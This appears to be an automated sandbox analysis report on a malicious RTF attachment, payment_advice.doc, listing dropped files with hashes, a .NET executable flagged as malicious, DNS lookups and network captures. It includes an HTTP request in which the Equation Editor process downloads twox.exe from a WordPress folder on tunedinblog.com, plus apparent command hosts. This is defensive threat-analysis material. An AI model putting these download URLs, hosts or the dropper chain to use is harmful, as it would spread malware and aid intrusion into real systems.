                                    IE Cache URL:http://tunedinblog.com/wp-includes/twox.exe
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..|9...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B08F3ED-537D-406E-B057-1B1541B1D39D}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1024
                                    Entropy (8bit):0.05390218305374581
                                    Encrypted:false
                                    SSDEEP:3:ol3lYdn:4Wn
                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                    Malicious:false
                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C67C7B4A-7023-4170-93C2-146687425423}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11560
                                    Entropy (8bit):3.613207132287162
                                    Encrypted:false
                                    SSDEEP:192:Oicjz5KZl05KRAPe1bnJbISzXCxERQLUEtryT/o5PWoC91en66UTDOu/FhXu+blZ:Oicj8Zl05KR7deH5Q/mcfenvU3vFhZb/
                                    MD5:F9F8BD9BC8E38FD4E0FB53B2DA587203
                                    SHA1:6935420F6974FEDD817DF65C5558C2D9311C745F
                                    SHA-256:1C812ED3BB1C464EB050B589BFD1636EFBEDAFA79D1C25D5DBA92377006F50D1
                                    SHA-512:BEAF6D6ED71DF1DEBC4920087D161D9CF3DE5FC9B47578EBC5501B9660E3F97E23130E6238EBF43DD62C0178E9EAEDC9A91471890FA560C718C9CDF4C7E7B737
                                    Malicious:false
                                    Preview: %.4.?._.7.&.?.`.?.].>.`.4.,.:.~.:...9.?.).7.~.,.)...=.?.?.'.,.;.9.?.0...=.@.?.-.*.?.#...!.9./.6.=...<.2.:.>.8.1.$.:._.'.?.`.~.-.?.4.!.?.].6.6.3.3.'.(.?.'.?.,.(.=.?.[.(.`.<.%.?.~.*...+.%.(.?.=.8.>.&.-.4.>./.=...!.6.~.?.?.?.6...%.<...'.!.$.1.%.^.!.#.,.?.(.?.1.:.^._.$.=.4...4.?.$.?.%.6.>.-.].9.;.3.).?...;.-.(./.9.|.!._.%.>.<.*...-.>...!.,.$.].].2.^.3.*.[.(.?.$.#.).&.|.(...?.?...'.'.?.<.*...`.@.=.(.?.<.<.;.).~.....(.?.4.#.?.3.6.1.?.5..._.@.,.+.*.,.].&.1.(...?.....,...$.=.?.,.?.%.4.?.4.4.7.`.?.0.;.%.&.?.8.2.0.&.?.=.4.8.?.#.0.5...4.1...5./.`.[.8.,.$.).1.|.?.>./...,.!.#.#.3.'.1.*.?.?./.<.0.4.9.?.%.2.+.4.6...;.2.(.<.5.>.)...&.=.&.'.?.8.[.^.6.!.).+.[.2.!.%.0.9.`.?.%.?.~.2.].'.>.,.$.+.5.1.:.0.[.%.3.9.6.].&.%.?.8.0.....?.!.3.#.?./.3.^.%.%.#./.)._.^.8.+.].0.%.#.?.0.=.+...?.1.;.~.!.<.7.5.:.?./.`.?.?.?._.(.7.9.`.:.'.^.).<.].'./.2.4.:.?._.9.[.*.0.`.>.$.[.?._...`...2.?...#._.?.$.>.$.<.=.5.~.)...1.@.2...../.-.9.=.6.....%.6.^.|.*.).,.4.*.8.].?.2.<._.).%.9.?.9.7.$.^.2.-.&.6.'.`.'.9.9.!.5.5.5.?.?.!.).^.).
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):80
                                    Entropy (8bit):4.446596383178742
                                    Encrypted:false
                                    SSDEEP:3:M1uauUlN1IUuUlmX1uauUlv:MsaXCUDad
                                    MD5:581FBF2AE768840AB0B959F0F569678B
                                    SHA1:0C573C2C44247C81D0C310489B7A04294A663404
                                    SHA-256:58F36BD775B77EC9D94614C1E4932A833C2F79FF74512166701FF301F4E1AC9E
                                    SHA-512:DF3C078CAA5688BDF95292781F36D00EE1ABEAE13A2D559B6AB026D16DA97846FCC1DC32BAA4082A12662BAC33CBE83332AA05C67A1440499C6443AB21890EC2
                                    Malicious:false
                                    Preview: [doc]..payment_advice.LNK=0..payment_advice.LNK=0..[doc]..payment_advice.LNK=0..
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\payment_advice.LNK
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Tue Feb 23 23:53:35 2021, length=326273, window=hide
                                    Category:dropped
                                    Size (bytes):2068
                                    Entropy (8bit):4.58953129298372
                                    Encrypted:false
                                    SSDEEP:24:83/XTwz6Ikn1ZeAZGDv3qvdM7dD23/XTwz6Ikn1ZeAZGDv3qvdM7dV:83/XT3Ik1ZxZNvQh23/XT3Ik1ZxZNvQ/
                                    MD5:7217FC118D825A713A3F199A336910D2
                                    SHA1:ECFE1395983AA08F3213313F1D00804FF42D853C
                                    SHA-256:D6DF2D99D16F89EECBFD5042527D5EDDFD8F6C8E6F63DBD6CB590240F9FC70BE
                                    SHA-512:48AD7DD8066650C4A48987487C648827A3D9BCEE6D88D15AEC62BE8C572532273787D4B1E57786BBBA69D3C0451B691D64CC78348773CDEC0518369711D11A14
                                    Malicious:false
                                    Preview: L..................F.... ...8.E..{..8.E..{..y..zG................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....XR.. .PAYMEN~1.DOC..R.......Q.y.Q.y*...8.....................p.a.y.m.e.n.t._.a.d.v.i.c.e...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\642294\Users.user\Desktop\payment_advice.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.y.m.e.n.t._.a.d.v.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......642294..........D_....3N...W...9F.C...........[D_
                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                    C:\Users\user\AppData\Roaming\twox67345.exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):629624
                                    Entropy (8bit):4.318973025796057
                                    Encrypted:false
                                    SSDEEP:6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
                                    MD5:3DC83F17122DD592D607424A54C1E9CB
                                    SHA1:CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
                                    SHA-256:D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                                    SHA-512:53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 38%
                                    Joe Sandbox View:
                                    • Filename: VIws8bzjD5.exe, Detection: malicious, Browse
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..|9...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                    C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                                    Process:C:\Users\user\AppData\Roaming\twox67345.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):629624
                                    Entropy (8bit):4.318973025796057
                                    Encrypted:false
                                    SSDEEP:6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
                                    MD5:3DC83F17122DD592D607424A54C1E9CB
                                    SHA1:CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
                                    SHA-256:D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                                    SHA-512:53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 38%
                                    Joe Sandbox View:
                                    • Filename: VIws8bzjD5.exe, Detection: malicious, Browse
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..|9...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                    C:\Users\user\Desktop\~$yment_advice.doc
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                    Static File Info

                                    General

                                    File type:Rich Text Format data, unknown version
                                    Entropy (8bit):4.117334916955769
                                    TrID:
                                    • Rich Text Format (5005/1) 55.56%
                                    • Rich Text Format (4004/1) 44.44%
                                    File name:payment_advice.doc
                                    File size:326273
                                    MD5:0ea6e37e930278b71774ae91d68bb879
                                    SHA1:5e3721c21b04c30c0f2d3b7e83b7bb506fd55cb8
                                    SHA256:3fda6eb4d90828826854806f1956d0d4a20bf5f95eb917370ff05ba5ba1dde66
                                    SHA512:413836d6e2382e6177fba3114efef67c0d291ba04a18b5f0bb4284a54408319c74c72b13e3ecd7e452718091227c9314af37b20005e30d22cfa8fbc7d7a83ad6
                                    SSDEEP:6144:L6LYrUVjkXdCfWd5ppJI8L4s5kSFxNPnfokdH9jGIWmiKduNNZJRfFsJ:3BCfWdtJf3/dYkdH9qKd8DsJ
                                    File Content Preview:{\rtf991%4?_7&?`?]>`4,:~:.9?)7~,).=??',;9?0.=@?-*?#.!9/6=.<2:>81$:_'?`~-?4!?]6633'(?'?,(=?[(`<%?~*.+%(?=8>&-4>/=.!6~???6.%<.'!$1%^!#,?(?1:^_$=4.4?$?%6>-]9;3)?.;-(/9|!_%><*.->.!,$]]2^3*[(?$#)&|(.??.''?<*.`@=(?<<;)~..(?4#?361?5._@,+*,]&1(.?..,.$=?,?%4?447`?

                                    File Icon

                                    Icon Hash:e4eea2aaa4b4b4a4

                                    Static RTF Info

                                    Objects

                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                    00000142Ahno

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    02/23/21-16:53:54.098868TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916580192.168.2.22150.95.81.183

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 23, 2021 16:53:53.842025995 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.098081112 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.098285913 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.098867893 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.353571892 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356101036 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356157064 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356198072 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356232882 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356267929 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356306076 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356307983 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356334925 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356343031 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356368065 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356376886 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356405020 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356412888 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356450081 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356451988 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.356468916 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.356519938 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.372745037 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.612919092 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.612977028 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613019943 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613019943 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613048077 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613055944 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613060951 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613092899 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613101959 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613131046 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613149881 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613187075 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613224030 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613230944 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613236904 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613267899 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613281012 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613312960 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613320112 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613354921 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613368034 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613425970 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613439083 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613461018 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613472939 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613497019 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613504887 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613539934 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613543987 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613588095 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.613594055 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.613663912 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.616348982 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.627536058 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.627619028 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868176937 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868235111 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868273020 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868309021 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868350029 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868387938 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868416071 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868452072 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868463039 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868489027 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868541002 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868546009 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868557930 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868565083 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868580103 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868602991 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868618011 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868633032 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868666887 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868666887 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868711948 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868752003 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868752003 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868777990 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868794918 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868824005 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868834019 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868849039 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868871927 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868911982 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868913889 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868932009 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.868951082 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.868977070 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.869003057 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.869024038 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.869048119 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.869066954 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.869088888 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.869118929 CET4916580192.168.2.22150.95.81.183
                                    Feb 23, 2021 16:53:54.869129896 CET8049165150.95.81.183192.168.2.22
                                    Feb 23, 2021 16:53:54.869153023 CET4916580192.168.2.22150.95.81.183

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 23, 2021 16:53:52.341901064 CET5219753192.168.2.228.8.8.8
                                    Feb 23, 2021 16:53:52.723155975 CET53521978.8.8.8192.168.2.22
                                    Feb 23, 2021 16:53:52.723788023 CET5219753192.168.2.228.8.8.8
                                    Feb 23, 2021 16:53:53.110671997 CET53521978.8.8.8192.168.2.22
                                    Feb 23, 2021 16:53:53.111388922 CET5219753192.168.2.228.8.8.8
                                    Feb 23, 2021 16:53:53.821729898 CET53521978.8.8.8192.168.2.22
                                    Feb 23, 2021 16:54:00.170200109 CET5309953192.168.2.228.8.8.8
                                    Feb 23, 2021 16:54:00.230391979 CET53530998.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:27.316231012 CET5283853192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:27.475828886 CET53528388.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:27.476371050 CET5283853192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:27.794637918 CET53528388.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:35.340843916 CET6120053192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:35.405267000 CET53612008.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:45.184340000 CET4954853192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:45.244551897 CET53495488.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:50.279475927 CET5562753192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:50.331012011 CET53556278.8.8.8192.168.2.22
                                    Feb 23, 2021 16:55:50.331909895 CET5562753192.168.2.228.8.8.8
                                    Feb 23, 2021 16:55:50.391808987 CET53556278.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Feb 23, 2021 16:53:52.341901064 CET192.168.2.228.8.8.80x62a5Standard query (0)tunedinblog.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:53:52.723788023 CET192.168.2.228.8.8.80x62a5Standard query (0)tunedinblog.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:53:53.111388922 CET192.168.2.228.8.8.80x62a5Standard query (0)tunedinblog.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:54:00.170200109 CET192.168.2.228.8.8.80x7a0aStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:27.316231012 CET192.168.2.228.8.8.80x1271Standard query (0)mail.tpcdel.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:27.476371050 CET192.168.2.228.8.8.80x1271Standard query (0)mail.tpcdel.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:35.340843916 CET192.168.2.228.8.8.80x7a16Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:45.184340000 CET192.168.2.228.8.8.80xf6f0Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:50.279475927 CET192.168.2.228.8.8.80x4f2bStandard query (0)mail.tpcdel.comA (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:50.331909895 CET192.168.2.228.8.8.80x4f2bStandard query (0)mail.tpcdel.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Feb 23, 2021 16:53:52.723155975 CET8.8.8.8192.168.2.220x62a5No error (0)tunedinblog.com150.95.81.183A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:53:53.110671997 CET8.8.8.8192.168.2.220x62a5No error (0)tunedinblog.com150.95.81.183A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:53:53.821729898 CET8.8.8.8192.168.2.220x62a5No error (0)tunedinblog.com150.95.81.183A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:54:00.230391979 CET8.8.8.8192.168.2.220x7a0aNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:54:00.230391979 CET8.8.8.8192.168.2.220x7a0aNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:27.475828886 CET8.8.8.8192.168.2.220x1271No error (0)mail.tpcdel.com103.35.120.75A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:27.794637918 CET8.8.8.8192.168.2.220x1271No error (0)mail.tpcdel.com103.35.120.75A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:35.405267000 CET8.8.8.8192.168.2.220x7a16No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:35.405267000 CET8.8.8.8192.168.2.220x7a16No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:45.244551897 CET8.8.8.8192.168.2.220xf6f0No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:45.244551897 CET8.8.8.8192.168.2.220xf6f0No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:50.331012011 CET8.8.8.8192.168.2.220x4f2bNo error (0)mail.tpcdel.com103.35.120.75A (IP address)IN (0x0001)
                                    Feb 23, 2021 16:55:50.391808987 CET8.8.8.8192.168.2.220x4f2bNo error (0)mail.tpcdel.com103.35.120.75A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • tunedinblog.com
                                    • coroloboxorozor.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165150.95.81.18380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData
                                    Feb 23, 2021 16:53:54.098867893 CET1OUTGET /wp-includes/twox.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: tunedinblog.com
                                    Connection: Keep-Alive
